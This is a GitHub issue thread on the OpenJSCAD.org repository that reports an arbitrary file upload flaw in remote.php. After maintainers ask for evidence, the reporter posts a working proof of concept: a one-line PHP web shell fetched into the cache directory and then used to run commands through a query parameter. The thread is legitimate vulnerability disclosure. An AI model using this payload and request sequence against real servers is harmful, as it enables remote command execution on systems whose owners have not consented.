jscad / OpenJSCAD.org

JSCAD is an open source set of modular, browser and command line tools for creating parametric 2D and 3D designs with JavaScript code. It provides a quick, precise and reproducible method for generating 3D models, and is especially useful for 3D printing applications.
https://openjscad.xyz/
MIT License

Remote.php has a security issue with arbitrary file uploads #1350

Open Beatriz-ai-boop opened 1 month ago

Beatriz-ai-boop commented 1 month ago

'packages/web/remote.php' lacks proper validation and sanitization of the $_REQUEST['url'] parameter. Malicious users could inject malicious URLs, leading to remote code execution or other attacks. Using the basename function may also cause path traversal issues.

hrgdavor commented 1 month ago

@Beatriz-ai-boop you need to be more specific and show an example. Taking into account the recent uptick in spam CVE reports, and "AI crap" bots doing CVE searches, you need to provide proof the CVE is real and not just assumed.

z3dev commented 1 month ago

Wow! Is @Beatriz-ai-boop trying to be helpful?

The good news is that the PHP remote is not being used.

Beatriz-ai-boop commented 1 month ago

Here are more details.

  1. First, download the project.
  2. Run mkdir cache in OpenJSCAD.org-master/packages/web/
  3. Request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/remote.php?url=http://127.0.0.1:8099/shell.php

shell.php is:

<?php echo "<?php \$o=exec(\$_GET['c']);echo \$o;?>"?>

  4. Request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/cache/240712060740-shell.php?c=whoami

Then you can execute any command based on this PHP file.

@hrgdavor @z3dev

z3dev commented 1 month ago

@Beatriz-ai-boop Go for it! Please make the fixes!